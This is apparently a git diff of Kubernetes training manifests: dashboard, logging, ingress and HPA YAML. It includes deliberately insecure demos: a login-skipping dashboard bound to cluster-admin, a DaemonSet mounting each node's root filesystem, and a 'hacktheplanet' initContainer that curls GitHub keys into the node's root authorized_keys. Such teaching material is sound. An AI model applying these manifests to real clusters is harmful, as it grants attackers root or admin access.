helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: http
port: 443
targetPort: http
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --sidecar-host=http://127.0.0.1:8000
- --enable-skip-login
- --enable-insecure-login
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 9090
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 9090
name: http
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:insecure
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard

View File

@@ -1,325 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume

View File

@@ -1,355 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:cluster-admin
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: null
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
name: cluster-admin-token
namespace: kubernetes-dashboard
annotations:
kubernetes.io/service-account.name: cluster-admin

View File

@@ -5,7 +5,7 @@ metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
@@ -21,7 +21,7 @@ rules:
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:

View File

@@ -11,7 +11,7 @@ metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
@@ -41,7 +41,7 @@ rules:
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
@@ -55,16 +55,13 @@ subjects:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
selector:
matchLabels:
name: elasticsearch-operator
template:
metadata:
labels:

View File

@@ -1,30 +0,0 @@
kind: Event
apiVersion: v1
metadata:
generateName: hello-
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
kind: Node
apiVersion: v1
name: kind-control-plane
# Note: the uid should be the Node name (not the uid of the Node).
# This might be specific to global objects.
uid: kind-control-plane
type: Warning
reason: NodeOverheat
message: "Node temperature exceeds critical threshold"
action: Hello
source:
component: thermal-probe
#host: node1
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -1,36 +0,0 @@
kind: Event
apiVersion: v1
metadata:
# One convention is to use <objectname>.<timestamp>,
# where the timestamp is taken with a nanosecond
# precision and expressed in hexadecimal.
# Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
name: hello.1234567890
# The label doesn't serve any purpose, except making
# it easier to identify or delete that specific event.
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
### These 5 lines should be updated to refer to an object.
### Make sure to put the correct "uid", because it is what
### "kubectl describe" is using to gather relevant events.
#apiVersion: v1
#kind: Pod
#name: magic-bean
#namespace: blue
#uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30
type: Normal
reason: BackupSuccessful
message: "Object successfully dumped to gitops repository"
source:
component: gitops-sync
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -52,7 +52,7 @@ data:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
@@ -60,9 +60,6 @@ metadata:
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
@@ -131,7 +128,7 @@ spec:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
@@ -144,7 +141,7 @@ roleRef:
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat

View File

@@ -1,4 +1,4 @@
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
@@ -11,4 +11,4 @@ roleRef:
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hackthecluster
spec:
selector:
matchLabels:
app: hackthecluster
template:
metadata:
labels:
app: hackthecluster
spec:
volumes:
- name: slash
hostPath:
path: /
tolerations:
- effect: NoSchedule
operator: Exists
containers:
- name: alpine
image: alpine
volumeMounts:
- name: slash
mountPath: /hostfs
command:
- sleep
- infinity
securityContext:
#privileged: true
capabilities:
add:
- SYS_CHROOT

View File

@@ -16,7 +16,8 @@ spec:
hostPath:
path: /root
tolerations:
- operator: Exists
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
@@ -26,7 +27,7 @@ spec:
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,16 +1,18 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5s
timeout client 50s
timeout server 50s
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
listen very-basic-load-balancer
frontend the-frontend
bind *:80
server blue color.blue.svc:80
server green color.green.svc:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check
### Note: the services above must exist,
### otherwise HAproxy won't start.

View File

@@ -1,29 +0,0 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2
metadata:
name: rng
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: rng
minReplicas: 1
maxReplicas: 20
behavior:
scaleUp:
stabilizationWindowSeconds: 60
scaleDown:
stabilizationWindowSeconds: 180
metrics:
- type: Object
object:
describedObject:
apiVersion: v1
kind: Service
name: httplat
metric:
name: httplat_latency_seconds
target:
type: Value
value: 0.1

View File

@@ -1,20 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: whatever
port:
number: 1234

View File

@@ -1,17 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234

View File

@@ -1 +0,0 @@
ingress-v1beta1.yaml

13
k8s/ingress.yaml Normal file
View File

@@ -0,0 +1,13 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234

360
k8s/insecure-dashboard.yaml Normal file
View File

@@ -0,0 +1,360 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Namespace
metadata:
name: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
data:
csrf: ""
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
kind: ConfigMap
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Deployment
apiVersion: apps/v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
